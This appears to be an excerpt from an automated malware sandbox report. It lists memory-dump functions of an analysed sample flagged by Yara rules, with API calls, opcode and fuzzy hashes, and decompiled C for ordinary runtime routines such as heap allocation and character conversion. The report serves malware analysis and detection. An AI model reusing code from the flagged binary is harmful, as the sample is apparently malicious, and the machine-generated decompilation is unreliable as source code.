                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000016.00000002.340410554.0000000005250000.00000040.00000001.sdmp, Offset: 05250000, based on PE: false
                Similarity
                • API ID: DispatchMessage
                • String ID:
                • API String ID: 2061451462-0
                • Opcode ID: 3a240eda2bab4f0a65e176f396df1d7cc37bee054b7e1b3dd40d8a15b4a154f6
                • Instruction ID: f2c4130700e62580c1a7865713b9c0243310a2e901018e7ed4f49c0ba6343f67
                • Opcode Fuzzy Hash: 3a240eda2bab4f0a65e176f396df1d7cc37bee054b7e1b3dd40d8a15b4a154f6
                • Instruction Fuzzy Hash: 4311F5B5C046499FCB10CF9AE4487DEFBF4EB48314F10851AD819A3600C3786545CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 009EFE38, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                Download Yara Rule
                APIs
                • SetWindowLongW.USER32(?,?,?), ref: 009EFE9D
                Memory Dump Source
                • Source File: 00000016.00000002.338873317.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                Similarity
                • API ID: LongWindow
                • String ID:
                • API String ID: 1378638983-0
                • Opcode ID: 360cce1c9d24d33f0f8f992794d6326b5226cd3c831174414c437e4205f5351b
                • Instruction ID: 3f43c8ef73cd86554abbc2ef96c8bde75ad93a9f2a02a7e98165074683446380
                • Opcode Fuzzy Hash: 360cce1c9d24d33f0f8f992794d6326b5226cd3c831174414c437e4205f5351b
                • Instruction Fuzzy Hash: 681133B59003898FDB11CF99D4847DEFBF4EB48314F20841AD959A7240C374AA45CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 009EFE40, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                Download Yara Rule
                APIs
                • SetWindowLongW.USER32(?,?,?), ref: 009EFE9D
                Memory Dump Source
                • Source File: 00000016.00000002.338873317.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                Similarity
                • API ID: LongWindow
                • String ID:
                • API String ID: 1378638983-0
                • Opcode ID: 35e916bc14a7bfc4f72d96e1fe21434ddae60c49f158cb0f0c6452aa44d933f1
                • Instruction ID: 34ecc966778e2888da94800f2fd263e77b9e46f285e069501fa3e574a787e135
                • Opcode Fuzzy Hash: 35e916bc14a7bfc4f72d96e1fe21434ddae60c49f158cb0f0c6452aa44d933f1
                • Instruction Fuzzy Hash: 3211E5B59002499FDB10CF9AD585BDEFBF8EB48324F10855AE919B7340C374A944CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04FBD238, Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                Download Yara Rule
                APIs
                • PostMessageW.USER32(?,00000018,00000001,?), ref: 04FBD29D
                Memory Dump Source
                • Source File: 00000016.00000002.339939060.0000000004FB0000.00000040.00000001.sdmp, Offset: 04FB0000, based on PE: false
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: ed3262676f3f35a59a602ac25781c6ec13bf25f4fba4d8201d40881916b758bc
                • Instruction ID: 103b8acdf93a7a4d5de68f8348960399cadad71ccb95d5c400ae14d0b19319ce
                • Opcode Fuzzy Hash: ed3262676f3f35a59a602ac25781c6ec13bf25f4fba4d8201d40881916b758bc
                • Instruction Fuzzy Hash: A11103B9D00789CFDB11CF99D584BDEBBF4EB48314F10841AD958A7640C378A655CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 05250440, Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000016.00000002.340410554.0000000005250000.00000040.00000001.sdmp, Offset: 05250000, based on PE: false
                Similarity
                • API ID: DispatchMessage
                • String ID:
                • API String ID: 2061451462-0
                • Opcode ID: 7afcaed5856fbe5d9ccd9391ed2c9ceefdc45be863cfb339303e189c68c20484
                • Instruction ID: 9eba245e34003afdd82a7e03df8a3d0237ebff6ce9601a6455251dddbe32ad0f
                • Opcode Fuzzy Hash: 7afcaed5856fbe5d9ccd9391ed2c9ceefdc45be863cfb339303e189c68c20484
                • Instruction Fuzzy Hash: D711CEB5D046498FCB10CF9AD848BDEFBF4EB48324F10852AE829A7240D378A545CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04FBC3D0, Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,04FB226A,?,00000000,?), ref: 04FBC435
                Memory Dump Source
                • Source File: 00000016.00000002.339939060.0000000004FB0000.00000040.00000001.sdmp, Offset: 04FB0000, based on PE: false
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 689d07e77e2580ce21029f06350863d8b6af450be07b3bd5ceb38ac81d680a88
                • Instruction ID: be6bd4214482bd8a7b9221b29dffea92824e3b86848cff2edb97807cb6e2bf65
                • Opcode Fuzzy Hash: 689d07e77e2580ce21029f06350863d8b6af450be07b3bd5ceb38ac81d680a88
                • Instruction Fuzzy Hash: 7B11D3B9900789CFDB10CF99D584BDEBBF4EB48314F10841AD958A7644C375AA45CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04FBBC59, Relevance: 1.5, APIs: 1, Instructions: 41windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 04FBBCBD
                Memory Dump Source
                • Source File: 00000016.00000002.339939060.0000000004FB0000.00000040.00000001.sdmp, Offset: 04FB0000, based on PE: false
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 935755b73fba4e68629433ed8c5f42e66491ffe9a7cfc6bc950a013710e02b90
                • Instruction ID: a3195dd65f43b2c936d8492592c6bb12fc4f90050563bfeefec5a03496b10053
                • Opcode Fuzzy Hash: 935755b73fba4e68629433ed8c5f42e66491ffe9a7cfc6bc950a013710e02b90
                • Instruction Fuzzy Hash: A11100B99007898FDB11CF99D584BDEBBF4EB48324F10841AD968A7640C378AA44CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403E3D, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 94%
                			E00403E3D(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00404831())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00403829();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E004068FD(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}







                0x00403e3d
                0x00403e43
                0x00403e49
                0x00403e7b
                0x00403e80
                0x00403e86
                0x00000000
                0x00403e86
                0x00403e4d
                0x00403e4f
                0x00403e4f
                0x00403e66
                0x00403e6f
                0x00403e77
                0x00000000
                0x00000000
                0x00403e57
                0x00403e59
                0x00000000
                0x00000000
                0x00403e5c
                0x00403e61
                0x00403e62
                0x00403e64
                0x00000000
                0x00000000
                0x00403e64
                0x00000000

                APIs
                • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                Memory Dump Source
                • Source File: 00000016.00000001.319216241.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                • Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
                • Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                • Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0090D5B0, Relevance: .1, Instructions: 75COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000016.00000002.338714364.000000000090D000.00000040.00000001.sdmp, Offset: 0090D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9646417c9a99040a4442b3cdd6d1f3616efc67582fe79249c8066271582e8d5b
                • Instruction ID: 68335197825c32d6f1436b17872489cd9444c7c8c78fd530697fe24db11eba40
                • Opcode Fuzzy Hash: 9646417c9a99040a4442b3cdd6d1f3616efc67582fe79249c8066271582e8d5b
                • Instruction Fuzzy Hash: D92125B1508244DFCB00DF90D8C0B2ABF65FB88314F34C569E9094B28AC33BD855DBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0091D1D4, Relevance: .1, Instructions: 72COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000016.00000002.338739183.000000000091D000.00000040.00000001.sdmp, Offset: 0091D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e0ba0f58568404ebc87ac362c6e74a2976a2752071876c2eee1edcdb61197bf6
                • Instruction ID: ddb66649c2ab0742eb5ac81e70ab8de026067874bd47e27793d8987a42718d01
                • Opcode Fuzzy Hash: e0ba0f58568404ebc87ac362c6e74a2976a2752071876c2eee1edcdb61197bf6
                • Instruction Fuzzy Hash: 0C210770608248EFDB05CF14D9C0B6ABBA5FB84314F34CE6DE9194B246C33AD886CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0091D01C, Relevance: .1, Instructions: 72COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000016.00000002.338739183.000000000091D000.00000040.00000001.sdmp, Offset: 0091D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 01236ccfbede99e81ed4a417b92903d0e13e000d84bf30be0656e406cae8ff6f
                • Instruction ID: 7d7f6abbcb90c05ba61d59e2479f9db28c345771d7cf0f490da37e081989b541
                • Opcode Fuzzy Hash: 01236ccfbede99e81ed4a417b92903d0e13e000d84bf30be0656e406cae8ff6f
                • Instruction Fuzzy Hash: C021F575708248EFDB14CF14D9C0B66BB65FB88314F24C96DE9094B246C33AD886CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0091D006, Relevance: .1, Instructions: 62COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000016.00000002.338739183.000000000091D000.00000040.00000001.sdmp, Offset: 0091D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fe24dbf1efa328d3092d3f6562f84d8af302bab3faa840ed65370cad98792e77
                • Instruction ID: f61169f57fb57cbf750b3c51c1c82c7c3c812d53bf0be7eb2e9b8ddd9082eca1
                • Opcode Fuzzy Hash: fe24dbf1efa328d3092d3f6562f84d8af302bab3faa840ed65370cad98792e77
                • Instruction Fuzzy Hash: FA2180755093C49FDB02CF24D990755BF71EB46314F28C5EAD8498B2A7C33AD84ACB62
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0090D5AB, Relevance: .1, Instructions: 56COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000016.00000002.338714364.000000000090D000.00000040.00000001.sdmp, Offset: 0090D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 520a709b2b53abc1a84ade3d88b0939ca7d6b7fe0f5f46f482eef57b391292f4
                • Instruction ID: e0b72f85c72940069c6f4a4261eaa5d77404640d0e6bf79094b66059a1d94534
                • Opcode Fuzzy Hash: 520a709b2b53abc1a84ade3d88b0939ca7d6b7fe0f5f46f482eef57b391292f4
                • Instruction Fuzzy Hash: 5111D376504280DFCF11CF50D9C4B16BF71FB84324F24C6A9D8094B256C336D85ACBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0091D1CF, Relevance: .1, Instructions: 53COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000016.00000002.338739183.000000000091D000.00000040.00000001.sdmp, Offset: 0091D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 782f9e41915746642c1b3bc8a08954d687731868874878b396c9b934aeaa4875
                • Instruction ID: 333340e58d9cb5a0c9fc3558b25e5d4b650c65a70252cf6d9e39ba4c12ddbac6
                • Opcode Fuzzy Hash: 782f9e41915746642c1b3bc8a08954d687731868874878b396c9b934aeaa4875
                • Instruction Fuzzy Hash: 0811DD75A04284DFDB01CF10D5C0B55FBA1FB84314F24CAAED8594B656C33AD84ACB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0090D01D, Relevance: .0, Instructions: 45COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000016.00000002.338714364.000000000090D000.00000040.00000001.sdmp, Offset: 0090D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 121bf21f8404b0b8d2e0f2cb015ca1242a1c6c9dd7331eeba81ad90e09c6af2d
                • Instruction ID: 8dc1efd877cfaee2e999e278c2a73237950bfed59d7db8bdff2ca505c6bfb79d
                • Opcode Fuzzy Hash: 121bf21f8404b0b8d2e0f2cb015ca1242a1c6c9dd7331eeba81ad90e09c6af2d
                • Instruction Fuzzy Hash: 8801F77140A3849EE7104A61CC8476ABBACEF41324F18C41AED4C5B2C6C379D945C7B1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0090D01C, Relevance: .0, Instructions: 36COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000016.00000002.338714364.000000000090D000.00000040.00000001.sdmp, Offset: 0090D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ecf2b106e6c274ac84ea0983990ea5f09f92e0b25c59d785aa762207e7759c38
                • Instruction ID: caebd33e918d33da57e24481594d1dbd3fda7cfe0828c8570cceb2f5f1997cee
                • Opcode Fuzzy Hash: ecf2b106e6c274ac84ea0983990ea5f09f92e0b25c59d785aa762207e7759c38
                • Instruction Fuzzy Hash: CEF0C271405284AEE7108E16CC84B66FBACEB41324F18C05AED480B286C3799C44CAB0
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 004078CF, Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                Download Yara Rule
                C-Code - Quality: 70%
                			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t56;
				signed int _t58;
				short* _t60;
				signed int _t64;
				short* _t68;
				int _t76;
				short* _t79;
				signed int _t85;
				signed int _t88;
				void* _t93;
				void* _t94;
				int _t96;
				short* _t99;
				int _t101;
				int _t103;
				signed int _t104;
				short* _t105;
				void* _t108;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x412014; // 0xf1d94be9
				_v8 = _t49 ^ _t104;
				_t101 = _a20;
				if(_t101 > 0) {
					_t76 = E004080DB(_a16, _t101);
					_t108 = _t76 - _t101;
					_t4 = _t76 + 1; // 0x1
					_t101 = _t4;
					if(_t108 >= 0) {
						_t101 = _t76;
					}
				}
				_t96 = _a32;
				if(_t96 == 0) {
					_t96 =  *( *_a4 + 8);
					_a32 = _t96;
				}
				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					E004018CC();
					return _t54;
				} else {
					_t93 = _t54 + _t54;
					_t83 = _t93 + 8;
					asm("sbb eax, eax");
					if((_t93 + 0x00000008 & _t54) == 0) {
						_t79 = 0;
						__eflags = 0;
						L14:
						if(_t79 == 0) {
							L36:
							_t103 = 0;
							L37:
							E004063D5(_t79);
							_t54 = _t103;
							goto L38;
						}
						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
						_t119 = _t56;
						if(_t56 == 0) {
							goto L36;
						}
						_t98 = _v12;
						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
						_t103 = _t58;
						if(_t103 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t94 = _t103 + _t103;
							_t85 = _t94 + 8;
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							__eflags = _t85 & _t58;
							if((_t85 & _t58) == 0) {
								_t99 = 0;
								__eflags = 0;
								L30:
								__eflags = _t99;
								if(__eflags == 0) {
									L35:
									E004063D5(_t99);
									goto L36;
								}
								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
								__eflags = _t103;
								if(_t103 != 0) {
									E004063D5(_t99);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t88 = _t94 + 8;
							__eflags = _t94 - _t88;
							asm("sbb eax, eax");
							_t64 = _t58 & _t88;
							_t85 = _t94 + 8;
							__eflags = _t64 - 0x400;
							if(_t64 > 0x400) {
								__eflags = _t94 - _t85;
								asm("sbb eax, eax");
								_t99 = E00403E3D(_t85, _t64 & _t85);
								_pop(_t85);
								__eflags = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								 *_t99 = 0xdddd;
								L28:
								_t99 =  &(_t99[4]);
								goto L30;
							}
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							E004018E0();
							_t99 = _t105;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L35;
							}
							 *_t99 = 0xcccc;
							goto L28;
						}
						_t68 = _a28;
						if(_t68 == 0) {
							goto L37;
						}
						_t123 = _t103 - _t68;
						if(_t103 > _t68) {
							goto L36;
						}
						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
						if(_t103 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t70 = _t54 & _t93 + 0x00000008;
					_t83 = _t93 + 8;
					if((_t54 & _t93 + 0x00000008) > 0x400) {
						__eflags = _t93 - _t83;
						asm("sbb eax, eax");
						_t79 = E00403E3D(_t83, _t70 & _t83);
						_pop(_t83);
						__eflags = _t79;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t79 = 0xdddd;
						L12:
						_t79 =  &(_t79[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E004018E0();
					_t79 = _t105;
					if(_t79 == 0) {
						goto L36;
					}
					 *_t79 = 0xcccc;
					goto L12;
				}
			}


























                0x004078d4
                0x004078d5
                0x004078d6
                0x004078dd
                0x004078e2
                0x004078e8
                0x004078ee
                0x004078f4
                0x004078f7
                0x004078f7
                0x004078fa
                0x004078fc
                0x004078fc
                0x004078fa
                0x004078fe
                0x00407903
                0x0040790a
                0x0040790d
                0x0040790d
                0x00407929
                0x0040792f
                0x00407934
                0x00407ac7
                0x00407ad2
                0x00407ada
                0x0040793a
                0x0040793a
                0x0040793d
                0x00407942
                0x00407946
                0x0040799a
                0x0040799a
                0x0040799c
                0x0040799e
                0x00407abc
                0x00407abc
                0x00407abe
                0x00407abf
                0x00407ac5
                0x00000000
                0x00407ac5
                0x004079af
                0x004079b5
                0x004079b7
                0x00000000
                0x00000000
                0x004079bd
                0x004079cf
                0x004079d4
                0x004079d8
                0x00000000
                0x00000000
                0x004079e5
                0x00407a1f
                0x00407a22
                0x00407a25
                0x00407a27
                0x00407a29
                0x00407a2b
                0x00407a77
                0x00407a77
                0x00407a79
                0x00407a79
                0x00407a7b
                0x00407ab5
                0x00407ab6
                0x00000000
                0x00407abb
                0x00407a8f
                0x00407a94
                0x00407a96
                0x00000000
                0x00000000
                0x00407a9a
                0x00407a9b
                0x00407a9c
                0x00407a9f
                0x00407adb
                0x00407ade
                0x00407aa1
                0x00407aa1
                0x00407aa2
                0x00407aa2
                0x00407aaf
                0x00407ab1
                0x00407ab3
                0x00407ae4
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00407ab3
                0x00407a2d
                0x00407a30
                0x00407a32
                0x00407a34
                0x00407a36
                0x00407a39
                0x00407a3e
                0x00407a59
                0x00407a5b
                0x00407a65
                0x00407a67
                0x00407a68
                0x00407a6a
                0x00000000
                0x00000000
                0x00407a6c
                0x00407a72
                0x00407a72
                0x00000000
                0x00407a72
                0x00407a40
                0x00407a42
                0x00407a46
                0x00407a4b
                0x00407a4d
                0x00407a4f
                0x00000000
                0x00000000
                0x00407a51
                0x00000000
                0x00407a51
                0x004079e7
                0x004079ec
                0x00000000
                0x00000000
                0x004079f2
                0x004079f4
                0x00000000
                0x00000000
                0x00407a10
                0x00407a14
                0x00000000
                0x00000000
                0x00000000
                0x00407a1a
                0x0040794d
                0x0040794f
                0x00407951
                0x00407959
                0x00407978
                0x0040797a
                0x00407984
                0x00407986
                0x00407987
                0x00407989
                0x00000000
                0x00000000
                0x0040798f
                0x00407995
                0x00407995
                0x00000000
                0x00407995
                0x0040795d
                0x00407961
                0x00407966
                0x0040796a
                0x00000000
                0x00000000
                0x00407970
                0x00000000
                0x00407970

                APIs
                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
                • __alloca_probe_16.LIBCMT ref: 00407961
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
                • __alloca_probe_16.LIBCMT ref: 00407A46
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
                • __freea.LIBCMT ref: 00407AB6
                  • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                • __freea.LIBCMT ref: 00407ABF
                • __freea.LIBCMT ref: 00407AE4
                Memory Dump Source
                • Source File: 00000016.00000001.319216241.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                • String ID:
                • API String ID: 3864826663-0
                • Opcode ID: 4e2b16b33ddca4ab3ce0f4135b96e08b33a6f9acdfd16cac7d83fd7473779ac7
                • Instruction ID: 6b6c65cbb01c1feb5c42b87555946cb45975c344a51f119bfb313b5904e0f739
                • Opcode Fuzzy Hash: 4e2b16b33ddca4ab3ce0f4135b96e08b33a6f9acdfd16cac7d83fd7473779ac7
                • Instruction Fuzzy Hash: BA51D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00408226, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                Download Yara Rule
                C-Code - Quality: 72%
                			E00408226(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t93;
				long _t96;
				void _t104;
				void* _t111;
				signed int _t115;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t136;
				signed int _t138;
				void* _t139;

				_t78 =  *0x412014; // 0xf1d94be9
				_v8 = _t78 ^ _t138;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t136 = _a4;
				_v60 = _t86;
				 *_t136 = 0;
				 *((intOrPtr*)(_t136 + 4)) = 0;
				 *((intOrPtr*)(_t136 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
					_t123 =  *(_t129 + _t115 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
							} else {
								_t111 = E00407222( &_v28, _t133, 2);
								_t139 = _t139 + 0xc;
								if(_t111 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t115 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t93 = E00407222();
						_t139 = _t139 + 0xc;
						if(_t93 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t96;
							if(_t96 != 0) {
								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
									L19:
									 *_t136 = GetLastError();
								} else {
									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t104 = 0xd;
											_v32 = _t104;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				E004018CC();
				return _t136;
			}



































                0x0040822e
                0x00408235
                0x00408238
                0x00408240
                0x00408244
                0x00408250
                0x00408253
                0x00408256
                0x0040825d
                0x00408265
                0x00408268
                0x0040826e
                0x00408274
                0x00408279
                0x0040827b
                0x0040827e
                0x00408283
                0x0040828d
                0x00408294
                0x00408297
                0x0040829e
                0x004082a5
                0x004082d1
                0x004082f7
                0x004082f9
                0x00000000
                0x004082d3
                0x004082d6
                0x0040839d
                0x004083a9
                0x004083b4
                0x004083b9
                0x004082dc
                0x004082e3
                0x004082e8
                0x004082ee
                0x004082f4
                0x00000000
                0x004082f4
                0x004082ee
                0x004082d6
                0x004082a7
                0x004082ab
                0x004082ae
                0x004082b4
                0x004082b6
                0x004082b9
                0x004082bd
                0x004082fa
                0x004082fd
                0x004082fe
                0x00408303
                0x00408309
                0x0040830f
                0x0040831e
                0x00408324
                0x0040832a
                0x0040832f
                0x0040834b
                0x004083be
                0x004083c4
                0x0040834d
                0x00408355
                0x0040835e
                0x00408364
                0x00000000
                0x00408366
                0x00408368
                0x0040836b
                0x00408384
                0x00000000
                0x00408386
                0x0040838a
                0x0040838c
                0x0040838f
                0x00000000
                0x0040838f
                0x0040838a
                0x00408384
                0x00408364
                0x0040835e
                0x0040834b
                0x0040832f
                0x00408309
                0x00000000
                0x00408392
                0x00408392
                0x004083c6
                0x004083d0
                0x004083d8

                APIs
                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0040899B,?,00000000,?,00000000,00000000), ref: 00408268
                • __fassign.LIBCMT ref: 004082E3
                • __fassign.LIBCMT ref: 004082FE
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408324
                • WriteFile.KERNEL32(?,?,00000000,0040899B,00000000,?,?,?,?,?,?,?,?,?,0040899B,?), ref: 00408343
                • WriteFile.KERNEL32(?,?,00000001,0040899B,00000000,?,?,?,?,?,?,?,?,?,0040899B,?), ref: 0040837C
                Memory Dump Source
                • Source File: 00000016.00000001.319216241.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                • String ID:
                • API String ID: 1324828854-0
                • Opcode ID: faa740b07254e6310bf4514787e462a3298cd29c6bed95f9d4542f2984ff3bdb
                • Instruction ID: fe7485239ce71f502252f8dacad0a730230a626615d7e560becd3163b8212ce1
